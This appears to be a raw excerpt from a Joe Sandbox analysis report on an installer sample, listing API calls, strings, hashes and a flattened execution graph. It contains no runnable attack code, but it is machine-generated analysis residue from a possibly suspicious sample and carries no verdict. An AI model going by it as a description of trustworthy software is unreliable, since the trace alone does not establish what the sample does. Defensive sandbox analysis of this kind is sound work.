                                                                • API ID: PrivateProfileStringlstrcmp
                                                                • String ID: !N~
                                                                • API String ID: 623250636-529124213
                                                                • Opcode ID: 866873a94fae700ec207294a0f2462ae5c2747d97e8320b74985250fbb79316b
                                                                • Instruction ID: 7cd271610f6b1cb64eb4c57d825f56a096f62725fe87e34e9129affe44791136
                                                                • Opcode Fuzzy Hash: 866873a94fae700ec207294a0f2462ae5c2747d97e8320b74985250fbb79316b
                                                                • Instruction Fuzzy Hash: 37E0E571500208ABDB00BBA0DE85DAE7BBCAF05304F14443AF641F71E3EA7459028718
                                                                APIs
                                                                • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00457278,Error launching installer), ref: 00405C64
                                                                • CloseHandle.KERNEL32(?), ref: 00405C71
                                                                Strings
                                                                • Error launching installer, xrefs: 00405C48
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2230884701.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.2230864947.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2230902191.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2230919350.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2230919350.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2230919350.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2230989786.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_Set-up.jbxd
                                                                Similarity
                                                                • API ID: CloseCreateHandleProcess
                                                                • String ID: Error launching installer
                                                                • API String ID: 3712363035-66219284
                                                                • Opcode ID: 47f41dc08d07e361b35e7f66cf96497c8c5e39d775029f064e59fed031f864e7
                                                                • Instruction ID: c3c9ba135fb9cbcc5263534f4c07e322ce29f53e9eda4e03cc008bde6a4ec24c
                                                                • Opcode Fuzzy Hash: 47f41dc08d07e361b35e7f66cf96497c8c5e39d775029f064e59fed031f864e7
                                                                • Instruction Fuzzy Hash: 44E0EC70504209ABEF009B64EE49E7F7BBCEB00305F504575BD51E2561D774D9188A68
                                                                APIs
                                                                • lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                                • wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                                  • Part of subcall function 004060E7: CloseHandle.KERNEL32(FFFFFFFF,00000000,?,?,004062D4,00000000), ref: 004060FE
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2230884701.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.2230864947.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2230902191.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2230919350.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2230919350.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2230919350.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2230989786.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_Set-up.jbxd
                                                                Similarity
                                                                • API ID: CloseHandlelstrlenwvsprintf
                                                                • String ID: RMDir: RemoveDirectory invalid input("")
                                                                • API String ID: 3509786178-2769509956
                                                                • Opcode ID: 7e77ee9ca870ff99cdb2782ad16b85c265d3824fde99dea76e58772afe0e1651
                                                                • Instruction ID: 8d95e7b1bd6a8fe250904a0927f32055e446839aab417a06e937ad69edd5bb19
                                                                • Opcode Fuzzy Hash: 7e77ee9ca870ff99cdb2782ad16b85c265d3824fde99dea76e58772afe0e1651
                                                                • Instruction Fuzzy Hash: 04D05E34150316BACA009BA0DE09E997B64FBD0384F50442EF147C5070FA748001C70E
                                                                APIs
                                                                • lstrlenA.KERNEL32(00000000,?,00000000,00000000,?,00000000,00406BD3,00000000,[Rename]), ref: 00405DC6
                                                                • lstrcmpiA.KERNEL32(?,?), ref: 00405DDE
                                                                • CharNextA.USER32(?,?,00000000,00406BD3,00000000,[Rename]), ref: 00405DEF
                                                                • lstrlenA.KERNEL32(?,?,00000000,00406BD3,00000000,[Rename]), ref: 00405DF8
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2230884701.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.2230864947.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2230902191.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2230919350.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2230919350.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2230919350.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2230989786.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_Set-up.jbxd
                                                                Similarity
                                                                • API ID: lstrlen$CharNextlstrcmpi
                                                                • String ID:
                                                                • API String ID: 190613189-0
                                                                • Opcode ID: f82830a26d6d2443e283ff34aa02cafdf5392a3ccdb3054c8558e2fdbecc5bb1
                                                                • Instruction ID: 82a91399e33c41d3abe84131f59dcd741317d7299bce3ff9d06b8c6e92496674
                                                                • Opcode Fuzzy Hash: f82830a26d6d2443e283ff34aa02cafdf5392a3ccdb3054c8558e2fdbecc5bb1
                                                                • Instruction Fuzzy Hash: D5F0CD31205988EFCB019FA9CD04C9FBBA8EF56350B2180AAE840E7310D630EE01DBA4

                                                                Execution Graph

                                                                Execution Coverage:13.9%
                                                                Dynamic/Decrypted Code Coverage:0%
                                                                Signature Coverage:2.7%
                                                                Total number of Nodes:1858
                                                                Total number of Limit Nodes:22
                                                                execution_graph 10342 412240 ??2@YAPAXI 10343 412251 10342->10343 10763 41945f __set_app_type __p__fmode __p__commode 10764 4194ce 10763->10764 10765 4194e2 10764->10765 10766 4194d6 __setusermatherr 10764->10766 10775 4195d6 _controlfp 10765->10775 10766->10765 10768 4194e7 _initterm __getmainargs _initterm 10769 41953b GetStartupInfoA 10768->10769 10771 41956f GetModuleHandleA 10769->10771 10776 4074d5 _EH_prolog 10771->10776 10775->10768 10779 405bfc ?_set_new_handler@@YAP6AHI@ZP6AHI@Z 10776->10779 11182 402017 GetModuleHandleW CreateWindowExW 10779->11182 10782 4074b4 MessageBoxA 10784 4074cb exit _XcptFilter 10782->10784 10783 405c3a 10783->10782 10785 405c54 10783->10785 10786 4014eb 2 API calls 10785->10786 10787 405c8b 10786->10787 10788 4014eb 2 API calls 10787->10788 10789 405c96 10788->10789 11185 404794 10789->11185 10794 402ab8 2 API calls 10795 405cd2 10794->10795 11194 4030cc 10795->11194 10797 405cdb lstrlenW 11208 40574f 10797->11208 10802 40574f 9 API calls 10803 405d11 10802->10803 10804 40574f 9 API calls 10803->10804 10805 405d1c 10804->10805 11224 404d0b #17 10805->11224 10808 405d34 wsprintfW 10810 405d51 10808->10810 10809 4011b7 2 API calls 10809->10808 10811 40574f 9 API calls 10810->10811 10812 405d63 10811->10812 11250 4046e2 10812->11250 10815 4046e2 3 API calls 10817 405dbe 10815->10817 10816 405d7b _wtol 10818 405d91 10816->10818 10819 405dc4 10817->10819 10820 405df8 10817->10820 10818->10815 11462 4052de 10819->11462 10822 4046e2 3 API calls 10820->10822 10823 405e03 10822->10823 10824 405e14 10823->10824 10825 405e09 10823->10825 10828 4046e2 3 API calls 10824->10828 11484 4056f2 10825->11484 10834 405e23 10828->10834 10830 405ddc ??3@YAXPAX ??3@YAXPAX 10830->10784 10831 405e59 GetModuleFileNameW 10832 405e6b 10831->10832 10833 405e7d 10831->10833 10836 409606 57 API calls 10832->10836 10837 4046e2 3 API calls 10833->10837 10834->10831 10835 4011b7 2 API calls 10834->10835 10835->10831 11028 405dc9 ??3@YAXPAX 10836->11028 10848 405e9f 10837->10848 10838 406047 10839 40143c 2 API calls 10838->10839 10840 406057 10839->10840 10841 40143c 2 API calls 10840->10841 10845 406064 10841->10845 10842 405f9c 10844 4046e2 3 API calls 10842->10844 10843 405f69 10843->10842 10847 405f85 _wtol 10843->10847 10843->11028 10856 405ffb 10844->10856 10846 4060e9 10845->10846 10850 401403 2 API calls 10845->10850 10849 402696 3 API calls 10846->10849 10847->10842 10848->10838 10848->10842 10848->10843 10853 401795 2 API calls 10848->10853 10848->11028 10851 40610b 10849->10851 10852 406099 10850->10852 10854 401403 2 API calls 10851->10854 10855 401403 2 API calls 10852->10855 10853->10848 10857 406116 ??2@YAPAXI 10854->10857 10861 4060af 10855->10861 10856->10838 10858 404e9f 2 API calls 10856->10858 10859 406122 10857->10859 10860 40602c 10858->10860 11255 4123e3 10859->11255 10860->10838 10862 40143c 2 API calls 10860->10862 10863 40143c 2 API calls 10861->10863 10862->10838 10864 4060d9 10863->10864 10866 40247d 19 API calls 10864->10866 10868 4060e0 10866->10868 10871 402ab8 2 API calls 10868->10871 10869 406175 11258 402b19 10869->11258 10870 40614f 10872 409606 57 API calls 10870->10872 10871->10846 10872->11028 10876 40618a 10877 406190 10876->10877 10878 4061b4 10876->10878 10879 409606 57 API calls 10877->10879 10880 406246 10878->10880 10882 4046e2 3 API calls 10878->10882 10881 406198 ??3@YAXPAX 10879->10881 11292 4127e6 10880->11292 10881->11028 10885 4061cb 10882->10885 10885->10880 10893 4061d1 10885->10893 10886 406273 10888 40622a ??3@YAXPAX 10886->10888 10897 40627c 10886->10897 10888->11028 10890 406268 ??3@YAXPAX 10890->11028 10891 406288 wsprintfW 10894 40247d 19 API calls 10891->10894 10892 4062bb 11295 404f0e 10892->11295 10893->10888 11492 40599c 10893->11492 10894->10897 10897->10891 10897->10892 10901 40574f 9 API calls 10897->10901 10899 40574f 9 API calls 10954 4062da 10899->10954 10900 406200 10900->10888 10902 406206 10900->10902 10901->10897 10903 409606 57 API calls 10902->10903 10904 40620e ??3@YAXPAX 10903->10904 10904->11028 10905 406594 10906 4065f3 10905->10906 10907 402a67 2 API calls 10905->10907 10908 40574f 9 API calls 10906->10908 10909 4065b2 10907->10909 10911 406624 10908->10911 10912 404bfd 3 API calls 10909->10912 10910 404505 lstrlenW lstrlenW _wcsnicmp 10910->10954 10913 402a67 2 API calls 10911->10913 10914 4065c5 10912->10914 10915 40662f 10913->10915 10916 40143c 2 API calls 10914->10916 11360 404bfd 10915->11360 10919 4065d1 ??3@YAXPAX ??3@YAXPAX 10916->10919 10921 405976 4 API calls 10919->10921 10923 4065eb 10921->10923 10922 40143c 2 API calls 10924 406650 ??3@YAXPAX ??3@YAXPAX 10922->10924 10925 405950 4 API calls 10923->10925 11372 405976 10924->11372 10925->10906 10927 40666a 11377 405950 10927->11377 10929 406672 10930 40574f 9 API calls 10929->10930 10931 40667f 10930->10931 10932 404f0e 26 API calls 10931->10932 10933 406688 10932->10933 10934 4067f4 10933->10934 11575 402744 AllocateAndInitializeSid 10933->11575 11382 4029a6 10934->11382 10938 4066af 10940 4014eb 2 API calls 10938->10940 10939 40689f 11385 404952 10939->11385 10942 4066b7 10940->10942 10941 402a67 2 API calls 10984 40680b 10941->10984 10945 4014eb 2 API calls 10942->10945 10943 4064b5 _wtol 10943->10954 10947 4066bf GetCommandLineW 10945->10947 10950 404e9f 2 API calls 10947->10950 10948 406926 CoInitialize 10956 4029a6 lstrcmpW 10948->10956 10949 4014eb 2 API calls 10949->10954 10955 4066cf 10950->10955 10951 4068a1 ??3@YAXPAX 10951->10939 10953 4029a6 lstrcmpW 10957 4068d5 10953->10957 10954->10905 10954->10910 10954->10943 10954->10949 10958 404e9f 2 API calls 10954->10958 10985 4065f8 ??3@YAXPAX 10954->10985 11547 405195 10954->11547 11558 4049a9 10954->11558 11572 401503 10954->11572 10959 402a67 2 API calls 10955->10959 10960 40694c 10956->10960 10961 4068e5 10957->10961 10965 40247d 19 API calls 10957->10965 10958->10954 10962 4066da 10959->10962 10964 406960 10960->10964 10971 401403 2 API calls 10960->10971 11590 404495 10961->11590 10968 404cb1 2 API calls 10962->10968 10963 4014eb ??2@YAPAXI ??3@YAXPAX 10963->10984 10972 4044ae 16 API calls 10964->10972 10965->10961 10975 4066f8 10968->10975 10969 40143c 2 API calls 10969->10984 10971->10964 10976 406966 10972->10976 10978 404ccf 2 API calls 10975->10978 10981 4029a6 lstrcmpW 10976->10981 10977 40844b 22 API calls 10982 406908 10977->10982 10979 406705 10978->10979 10983 404ccf 2 API calls 10979->10983 10980 401403 2 API calls 10980->10984 10986 406976 10981->10986 11593 4081be ??3@YAXPAX 10982->11593 10988 406712 10983->10988 10984->10939 10984->10941 10984->10951 10984->10963 10984->10969 10984->10980 11583 4035cf ??2@YAPAXI 10984->11583 11589 402990 ??3@YAXPAX ??3@YAXPAX 10984->11589 10985->11028 10990 406a4f 10986->10990 10997 40698f lstrlenW 10986->10997 11578 404ced 10988->11578 10993 4029a6 lstrcmpW 10990->10993 10991 406913 ??3@YAXPAX 10991->10948 10994 406a60 10993->10994 10998 406a74 10994->10998 10999 406a67 _wtol 10994->10999 11015 4069a7 10997->11015 11002 406a96 10998->11002 11594 4097f6 10998->11594 10999->10998 11000 4017c0 2 API calls 11003 40672c 11000->11003 11001 40687c ??3@YAXPAX 11004 4029a6 lstrcmpW 11001->11004 11007 406aaa 11002->11007 11008 406a86 ??3@YAXPAX 11002->11008 11611 4096fb 11002->11611 11006 40143c 2 API calls 11003->11006 11004->10984 11009 406738 7 API calls 11006->11009 11050 406adb 11007->11050 11391 4015d8 11007->11391 11008->11002 11011 4053b2 9 API calls 11009->11011 11013 406780 11011->11013 11016 40678a ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX 11013->11016 11017 4067be ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX 11013->11017 11021 401503 2 API calls 11015->11021 11016->11028 11017->11028 11018 406ac1 ??3@YAXPAX 11018->11028 11019 4014eb 2 API calls 11019->11050 11021->10990 11022 406c64 ??3@YAXPAX 11022->11028 11023 406b19 GetKeyState 11023->11050 11024 406cc6 11026 406cfc 11024->11026 11027 406cce 11024->11027 11025 4029a6 lstrcmpW 11025->11050 11031 4013d1 2 API calls 11026->11031 11665 4048a3 11027->11665 11479 4047e1 11028->11479 11029 401795 ??2@YAPAXI ??3@YAXPAX 11029->11050 11034 406d0a 11031->11034 11036 4044ae 16 API calls 11034->11036 11035 40143c 2 API calls 11037 406ceb ??3@YAXPAX 11035->11037 11038 406d13 11036->11038 11046 406d33 11037->11046 11039 406d24 ??3@YAXPAX 11038->11039 11043 40143c 2 API calls 11038->11043 11039->11046 11040 406cb6 ??3@YAXPAX ??3@YAXPAX 11040->11028 11041 406c59 ??3@YAXPAX 11041->11050 11042 406c83 11044 409606 57 API calls 11042->11044 11043->11039 11045 406c8f ??3@YAXPAX ??3@YAXPAX 11044->11045 11045->11028 11048 406d70 11046->11048 11049 406d7d 11046->11049 11047 401403 ??2@YAPAXI ??3@YAXPAX 11047->11050 11404 4019d2 ??2@YAPAXI 11048->11404 11678 408caa 11049->11678 11050->11019 11050->11022 11050->11023 11050->11024 11050->11025 11050->11029 11050->11040 11050->11041 11050->11042 11050->11047 11644 408bec 11050->11644 11657 408c6a 11050->11657 11053 406d79 11054 406dba 11053->11054 11055 406d8f 11053->11055 11056 404952 22 API calls 11054->11056 11686 40477e 11055->11686 11058 406dbf 11056->11058 11060 4073b0 11058->11060 11061 4014eb 2 API calls 11058->11061 11063 407428 11060->11063 11065 4029a6 lstrcmpW 11060->11065 11062 406ddd 11061->11062 11105 406df0 11062->11105 11690 404e49 11062->11690 11064 40746b ??3@YAXPAX ??3@YAXPAX 11063->11064 11070 4029a6 lstrcmpW 11063->11070 11068 407484 11064->11068 11069 40748a ??3@YAXPAX 11064->11069 11067 4073e1 11065->11067 11067->11063 11757 404765 11067->11757 11068->11069 11071 4047e1 3 API calls 11069->11071 11072 407447 11070->11072 11074 40749b ??3@YAXPAX ??3@YAXPAX 11071->11074 11072->11064 11076 407454 11072->11076 11073 4014eb ??2@YAPAXI ??3@YAXPAX 11073->11105 11074->10784 11079 4013d1 2 API calls 11076->11079 11077 406e1f 11080 407246 ??3@YAXPAX ??3@YAXPAX 11077->11080 11081 406e2c 11077->11081 11085 407463 11079->11085 11084 40734f 11080->11084 11086 404ccf 2 API calls 11081->11086 11082 4029a6 lstrcmpW 11082->11105 11083 40844b 22 API calls 11087 40741d 11083->11087 11088 4073a7 ??3@YAXPAX 11084->11088 11094 404952 22 API calls 11084->11094 11761 405793 11085->11761 11090 406e48 11086->11090 11760 4081be ??3@YAXPAX 11087->11760 11088->11060 11096 404ccf 2 API calls 11090->11096 11091 406e8c 11093 401403 2 API calls 11091->11093 11097 406e95 11093->11097 11098 40735e 11094->11098 11099 406e55 11096->11099 11101 4044e2 20 API calls 11097->11101 11747 4051f3 11098->11747 11104 40143c 2 API calls 11099->11104 11100 4072ac ??3@YAXPAX ??3@YAXPAX 11100->11084 11120 406e9e 11101->11120 11102 401403 2 API calls 11102->11105 11107 406e61 ??3@YAXPAX ??3@YAXPAX GetFileAttributesW 11104->11107 11105->11073 11105->11077 11105->11082 11105->11091 11105->11100 11105->11102 11108 401795 2 API calls 11105->11108 11106 407377 SetCurrentDirectoryW 11109 4051f3 4 API calls 11106->11109 11110 406e88 11107->11110 11111 40725d 11107->11111 11113 406f2c ??3@YAXPAX ??3@YAXPAX 11108->11113 11114 40739f 11109->11114 11110->11091 11112 40477e 16 API calls 11111->11112 11115 407262 11112->11115 11113->11105 11116 40477e 16 API calls 11114->11116 11117 409606 57 API calls 11115->11117 11116->11088 11118 40726b ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX 11117->11118 11118->11028 11119 4072a1 11118->11119 11119->11028 11121 406fcb _wtol 11120->11121 11122 40453f lstrlenW lstrlenW _wcsnicmp 11120->11122 11123 40708f 11120->11123 11121->11120 11122->11120 11124 407098 11123->11124 11125 4070ea 11123->11125 11126 4070bd 11124->11126 11127 40709e 11124->11127 11128 40143c 2 API calls 11125->11128 11131 401403 2 API calls 11126->11131 11129 401403 2 API calls 11127->11129 11130 4070e8 11128->11130 11132 4070a9 11129->11132 11133 402ab8 2 API calls 11130->11133 11134 4070bb 11131->11134 11135 402ab8 2 API calls 11132->11135 11136 4070fc 11133->11136 11137 4029a6 lstrcmpW 11134->11137 11138 4070b2 11135->11138 11139 4014eb 2 API calls 11136->11139 11140 4070d2 11137->11140 11141 402ab8 2 API calls 11138->11141 11142 407104 11139->11142 11140->11136 11143 402ab8 2 API calls 11140->11143 11141->11134 11144 404e9f 2 API calls 11142->11144 11143->11130 11145 407111 11144->11145 11146 402a67 2 API calls 11145->11146 11147 40711c 11146->11147 11148 4044e2 20 API calls 11147->11148 11149 407125 11148->11149 11150 407200 11149->11150 11425 402713 11149->11425 11152 40732e ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX 11150->11152 11154 407214 ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX 11150->11154 11152->11084 11153 40713a 11153->11150 11155 407154 11153->11155 11156 402ab8 2 API calls 11153->11156 11154->11080 11157 4044e2 20 API calls 11155->11157 11156->11155 11158 40716c 11157->11158 11159 4071e2 11158->11159 11160 407173 11158->11160 11699 405489 11159->11699 11434 404cb1 11160->11434 11163 4071f0 11165 4072cb SetLastError 11163->11165 11166 4071fb 11163->11166 11170 4072d2 11165->11170 11744 4026ab 11166->11744 11172 409606 57 API calls 11170->11172 11171 4017c0 2 API calls 11173 4071a8 ??3@YAXPAX ??3@YAXPAX 11171->11173 11174 4072dc 11172->11174 11444 4053b2 11173->11444 11176 40477e 16 API calls 11174->11176 11178 4072e1 7 API calls 11176->11178 11177 4071cc 11180 4072c3 ??3@YAXPAX 11177->11180 11181 4071da ??3@YAXPAX 11177->11181 11179 407321 11178->11179 11179->11152 11180->11170 11181->11166 11183 40204c SetTimer GetMessageW DispatchMessageW KillTimer KiUserCallbackDispatcher 11182->11183 11184 40207f GetVersionExW 11182->11184 11183->11184 11184->10782 11184->10783 11186 4011b7 2 API calls 11185->11186 11187 4047a9 GetCommandLineW 11186->11187 11188 404e9f 11187->11188 11189 404ed9 11188->11189 11190 404ead 11188->11190 11191 404ed1 11189->11191 11193 401795 2 API calls 11189->11193 11190->11191 11192 401795 2 API calls 11190->11192 11191->10794 11192->11190 11193->11189 11195 4014eb 2 API calls 11194->11195 11203 4030dc 11195->11203 11196 4031c2 11197 40143c 2 API calls 11196->11197 11198 4031cf ??3@YAXPAX 11197->11198 11198->10797 11199 401795 ??2@YAPAXI ??3@YAXPAX 11199->11203 11201 4014eb 2 API calls 11201->11203 11203->11196 11203->11199 11203->11201 11204 40143c 2 API calls 11203->11204 11800 402b31 11203->11800 11803 402dce 11203->11803 11205 40313c ??3@YAXPAX 11204->11205 11206 4014bc 2 API calls 11205->11206 11207 403151 ??3@YAXPAX ??3@YAXPAX 11206->11207 11207->11203 11209 4014eb 2 API calls 11208->11209 11210 40575d 11209->11210 11211 4014eb 2 API calls 11210->11211 11212 405765 11211->11212 11213 401403 2 API calls 11212->11213 11214 405770 11213->11214 11215 401403 2 API calls 11214->11215 11216 40577b 11215->11216 11217 4035cf 7 API calls 11216->11217 11218 405789 11217->11218 11818 402990 ??3@YAXPAX ??3@YAXPAX 11218->11818 11220 405791 11221 402696 11220->11221 11819 402665 LoadLibraryA GetProcAddress 11221->11819 11223 40269b 11223->10802 11225 404d22 11224->11225 11226 402427 3 API calls 11225->11226 11227 404d27 11226->11227 11228 40247d 19 API calls 11227->11228 11229 404d2e 11228->11229 11230 40247d 19 API calls 11229->11230 11231 404d3a 11230->11231 11232 40247d 19 API calls 11231->11232 11233 404d46 11232->11233 11234 40247d 19 API calls 11233->11234 11235 404d52 11234->11235 11236 40247d 19 API calls 11235->11236 11237 404d5e 11236->11237 11238 40247d 19 API calls 11237->11238 11239 404d6a 11238->11239 11240 40247d 19 API calls 11239->11240 11246 404d76 11240->11246 11241 404d91 SHGetSpecialFolderPathW 11242 404dab wsprintfW 11241->11242 11241->11246 11243 4014eb 2 API calls 11242->11243 11243->11246 11244 404e44 11244->10808 11244->10809 11245 4014eb 2 API calls 11245->11246 11246->11241 11246->11244 11246->11245 11248 401403 ??2@YAPAXI ??3@YAXPAX 11246->11248 11249 4035cf 7 API calls 11246->11249 11822 402990 ??3@YAXPAX ??3@YAXPAX 11246->11822 11248->11246 11249->11246 11251 4046f1 11250->11251 11252 40472e 11251->11252 11253 40470b lstrlenW lstrlenW 11251->11253 11252->10816 11252->10818 11823 401f6a 11253->11823 11833 4123c1 11255->11833 11259 402805 2 API calls 11258->11259 11260 402b2d 11259->11260 11261 403f89 11260->11261 11262 402665 3 API calls 11261->11262 11263 403f97 11262->11263 11264 402b19 2 API calls 11263->11264 11265 403fd0 11264->11265 11266 402b19 2 API calls 11265->11266 11267 403fd8 11266->11267 11268 402b19 2 API calls 11267->11268 11269 403fe0 11268->11269 11839 403e98 11269->11839 11275 404076 11276 403e98 7 API calls 11275->11276 11278 40408c 11276->11278 11277 403e98 7 API calls 11282 40401d 11277->11282 11279 402ee4 10 API calls 11278->11279 11281 40409e 11279->11281 11280 402ee4 10 API calls 11280->11282 11882 402c7f 11281->11882 11282->11275 11282->11277 11282->11280 11284 402c7f 2 API calls 11282->11284 11885 402c49 11282->11885 11284->11282 11286 404114 ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX 11286->10876 11287 403e98 7 API calls 11289 4040b4 11287->11289 11288 402ee4 10 API calls 11288->11289 11289->11286 11289->11287 11289->11288 11290 402c49 2 API calls 11289->11290 11291 402c7f 2 API calls 11289->11291 11290->11289 11291->11289 11928 412709 11292->11928 11296 4029a6 lstrcmpW 11295->11296 11297 404f27 11296->11297 11298 404f77 11297->11298 11300 401403 2 API calls 11297->11300 11299 4029a6 lstrcmpW 11298->11299 11301 404f95 11299->11301 11302 404f3e 11300->11302 11304 4029a6 lstrcmpW 11301->11304 11303 40247d 19 API calls 11302->11303 11305 404f45 11303->11305 11306 404fad 11304->11306 11307 402ab8 2 API calls 11305->11307 11309 4029a6 lstrcmpW 11306->11309 11308 404f4e 11307->11308 11310 401403 2 API calls 11308->11310 11311 404fc5 11309->11311 11312 404f67 11310->11312 11314 4029a6 lstrcmpW 11311->11314 11313 40247d 19 API calls 11312->11313 11315 404f6e 11313->11315 11316 404fdd 11314->11316 11317 402ab8 2 API calls 11315->11317 11318 404fe4 lstrcmpiW 11316->11318 11319 404ff4 11316->11319 11317->11298 11318->11319 11320 4029a6 lstrcmpW 11319->11320 11321 40500a 11320->11321 11322 4029a6 lstrcmpW 11321->11322 11323 405037 11322->11323 11324 405044 11323->11324 11945 404690 11323->11945 11326 4029a6 lstrcmpW 11324->11326 11330 405058 11326->11330 11327 405078 11329 4029a6 lstrcmpW 11327->11329 11336 40508b 11329->11336 11330->11327 11331 4029a6 lstrcmpW 11330->11331 11949 404637 11330->11949 11331->11330 11332 4050ab 11334 4029a6 lstrcmpW 11332->11334 11335 4050b7 11334->11335 11337 4029a6 lstrcmpW 11335->11337 11336->11332 11338 4029a6 lstrcmpW 11336->11338 11953 404668 11336->11953 11339 4050c8 11337->11339 11338->11336 11340 4029a6 lstrcmpW 11339->11340 11341 4050d9 11340->11341 11342 4050e6 _wtol 11341->11342 11343 4050ef 11341->11343 11342->11343 11344 4029a6 lstrcmpW 11343->11344 11345 4050fb 11344->11345 11346 405102 _wtol 11345->11346 11347 40510b 11345->11347 11346->11347 11348 4029a6 lstrcmpW 11347->11348 11349 405117 11348->11349 11350 4029a6 lstrcmpW 11349->11350 11351 40512f 11350->11351 11352 4029a6 lstrcmpW 11351->11352 11353 405147 11352->11353 11354 4029a6 lstrcmpW 11353->11354 11355 40515f 11354->11355 11356 4029a6 lstrcmpW 11355->11356 11357 40517c 11356->11357 11358 40518d 11357->11358 11359 40247d 19 API calls 11357->11359 11358->10899 11359->11358 11361 404c17 11360->11361 11362 404c2e 11361->11362 11363 404c23 11361->11363 11364 4014eb 2 API calls 11362->11364 11365 4013d1 2 API calls 11363->11365 11366 404c37 11364->11366 11368 404c2c 11365->11368 11367 4011b7 2 API calls 11366->11367 11369 404c40 11367->11369 11368->10922 11370 4013d1 2 API calls 11369->11370 11371 404c73 ??3@YAXPAX 11370->11371 11371->11368 11961 404c84 11372->11961 11378 404c84 2 API calls 11377->11378 11379 405962 11378->11379 11979 404813 11379->11979 11983 402910 11382->11983 11386 404963 11385->11386 11387 4049a6 11385->11387 11388 4013d1 2 API calls 11386->11388 11389 4044e2 20 API calls 11386->11389 11387->10948 11387->10953 11388->11386 11390 404980 SetEnvironmentVariableW ??3@YAXPAX 11389->11390 11390->11386 11390->11387 11392 4015f2 ??2@YAPAXI 11391->11392 11397 4015ea 11391->11397 11393 401601 11392->11393 11403 412a6a 3 API calls 11393->11403 11394 401623 11987 40113f 11394->11987 11396 401647 11396->11397 11398 412574 VariantClear 11396->11398 11399 4016aa 11396->11399 11397->11018 11397->11050 11398->11396 11992 401556 11399->11992 11402 412574 VariantClear 11402->11397 11403->11394 11405 4019eb 11404->11405 11424 412a6a 3 API calls 11405->11424 11406 401a0f 11407 401a90 11406->11407 11408 401a21 ??2@YAPAXI 11406->11408 11410 409606 57 API calls 11407->11410 11409 401a2d 11408->11409 11411 40113f 176 API calls 11409->11411 11423 401aa9 11410->11423 11412 401a5a 11411->11412 11412->11407 11413 401a61 11412->11413 11414 401a79 ??2@YAPAXI 11413->11414 11415 4039e7 88 API calls 11413->11415 11416 401a85 11414->11416 11417 401a8c 11414->11417 11418 401a74 11415->11418 12608 4016d4 11416->12608 11420 4015d8 178 API calls 11417->11420 11418->11414 11418->11423 11421 401ad3 11420->11421 12589 401880 11421->12589 11423->11053 11424->11406 11426 402721 11425->11426 11427 40271c 11425->11427 11428 402665 3 API calls 11426->11428 11427->11153 11429 402726 11428->11429 11430 402737 11429->11430 11431 402730 11429->11431 11430->11153 12619 4026df LoadLibraryA GetProcAddress 11431->12619 11435 404794 2 API calls 11434->11435 11436 404cbf 11435->11436 11437 4014bc 2 API calls 11436->11437 11438 404cca 11437->11438 11439 404ccf 11438->11439 11440 4013d1 2 API calls 11439->11440 11441 404cdd 11440->11441 11442 402ab8 2 API calls 11441->11442 11443 404ce8 11442->11443 11443->11171 11445 4014eb 2 API calls 11444->11445 11446 4053c3 11445->11446 11447 4014eb 2 API calls 11446->11447 11448 4053cb memset 11447->11448 11449 4053f9 11448->11449 11450 404e9f 2 API calls 11449->11450 11451 40541c 11450->11451 11452 401403 2 API calls 11451->11452 11453 405427 11452->11453 11454 405445 ShellExecuteExW 11453->11454 11455 40542c ??3@YAXPAX 11453->11455 11457 405485 11454->11457 11458 40545f 11454->11458 11456 405437 ??3@YAXPAX 11455->11456 11456->11177 11459 40547c ??3@YAXPAX 11457->11459 11460 405473 CloseHandle 11458->11460 11461 405468 WaitForSingleObject 11458->11461 11459->11456 11460->11459 